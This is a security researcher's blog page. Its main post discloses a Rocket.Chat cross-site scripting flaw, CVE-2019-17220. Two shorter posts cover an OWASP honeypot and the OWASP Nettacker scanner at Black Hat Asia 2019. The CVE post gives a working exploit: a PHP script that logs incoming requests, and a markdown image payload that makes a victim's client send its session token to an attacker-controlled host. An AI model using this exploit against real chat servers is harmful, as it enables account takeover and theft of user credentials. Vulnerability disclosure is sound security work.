Wednesday, October 2, 2019

Rocket.Chat Cross Site Scripting CVE-2019-17220

Rocket.Chat versions prior to 2.1.0 suffer from a cross-site scripting vulnerability.

As I found out, the service has a security problem that will lead to the disclosure of user information.

Packet Storm
Mitre CVE
NIST
Exploit-DB



 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat < 2.1.0
# CVE: CVE-2019-17220
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)

1. Create l33t.php on a web server 


<?php
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

2. Open a chat session
3. Send payload with your web server url


![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

4. Token will be written in logs.txt when target seen your message.

Friday, April 12, 2019

OWASP Honeypot

In our first test of the OWASP Honeypot with Ali Razmjoo, I am gonna say that among all attacks we are receiving, Russians are doing it smarter and more effective

API: API Docs:






Black Hat Asia 2019

Our OWASP Nettacker: Automated Penetration Testing Framework has been accepted for Black Hat Asia Arsenal 2019.

https://www.blackhat.com/asia-19/arsenal/schedule/index.html#owasp-nettacker-automated-penetration-testing-framework-14336


The OWASP Nettacker project was created to automate information gathering, vulnerability scanning, and eventually generating a report for networks, including services, bugs, vulnerabilities, misconfigurations, and other information. This software will utilize TCP SYN, ACK, ICMP and many other protocols in order to detect and bypass Firewall/IDS/IPS devices. By leveraging a unique method in OWASP Nettacker for discovering protected services and devices such as SCADA, it would make a competitive edge compared to other scanners, making it one of the best.




The Black Hat photographer has uploaded some pictures to Flickr; you can check them out, here: https://www.flickr.com/photos/blackhatevents/albums/72157707843897024